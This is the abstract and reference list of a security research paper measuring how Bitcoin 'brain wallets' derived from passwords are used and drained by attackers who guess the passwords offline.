The Bitcoin Brain Drain: Examining the Use and Abuse of Bitcoin Brain Wallets

In the cryptocurrency Bitcoin, users can deterministically derive the private keys used for transmitting money from a password. Such “brain wallets” are appealing because they free users from storing their private keys on untrusted computers. Unfortunately, they also enable attackers to conduct unlimited offline password guessing. In this paper, we report on the first large-scale measurement of the use of brain wallets in Bitcoin. Using a wide range of word lists, we evaluated around 300 billion passwords. Surprisingly, after excluding activities by researchers, we identified just 884 brain wallets worth around $100K in use from September 2011 to August 2015. We find that all but 21 wallets were drained, usually within 24 h but often within minutes. We find that around a dozen “drainers” are competing to liquidate brain wallets as soon as they are funded. We find no evidence that users of brain wallets loaded with more bitcoin select stronger passwords, but we do find that brain wallets with weaker passwords are cracked more quickly.

[1]  Elaine Shi,et al.  Bitter to Better - How to Make Bitcoin a Better Currency , 2012, Financial Cryptography.

[2]  Nicolas Courtois,et al.  Speed Optimizations in Bitcoin Key Recovery Attacks , 2016, IACR Cryptol. ePrint Arch..

[3]  Cormac Herley,et al.  So long, and no thanks for the externalities: the rational rejection of security advice by users , 2009, NSPW '09.

[4]  Sudhir Aggarwal,et al.  Testing metrics for password creation policies by attacking large sets of revealed passwords , 2010, CCS '10.

[5]  Jeremy Clark,et al.  A first look at the usability of bitcoin key management , 2018, ArXiv.

[6]  Mohammad Mannan,et al.  From Very Weak to Very Strong: Analyzing Password-Strength Meters , 2014, NDSS.

[7]  Joseph Bonneau Statistical Metrics for Individual Password Strength , 2012, Security Protocols Workshop.

[8]  Nicolas Christin,et al.  Traveling the silk road: a measurement analysis of a large anonymous online marketplace , 2012, WWW.

[9]  Michael Bedford Taylor,et al.  Bitcoin and the age of Bespoke Silicon , 2013, 2013 International Conference on Compilers, Architecture and Synthesis for Embedded Systems (CASES).

[10]  Joseph Bonneau,et al.  The Science of Guessing: Analyzing an Anonymized Corpus of 70 Million Passwords , 2012, 2012 IEEE Symposium on Security and Privacy.

[11]  Joseph Bonneau Statistical Metrics for Individual Password Strength (Transcript of Discussion) , 2012, Security Protocols Workshop.

[12]  T. Moore,et al.  Bitcoin: Economics, Technology, and Governance , 2014 .

[13]  Jeremy Clark,et al.  SoK: Research Perspectives and Challenges for Bitcoin and Cryptocurrencies , 2015, 2015 IEEE Symposium on Security and Privacy.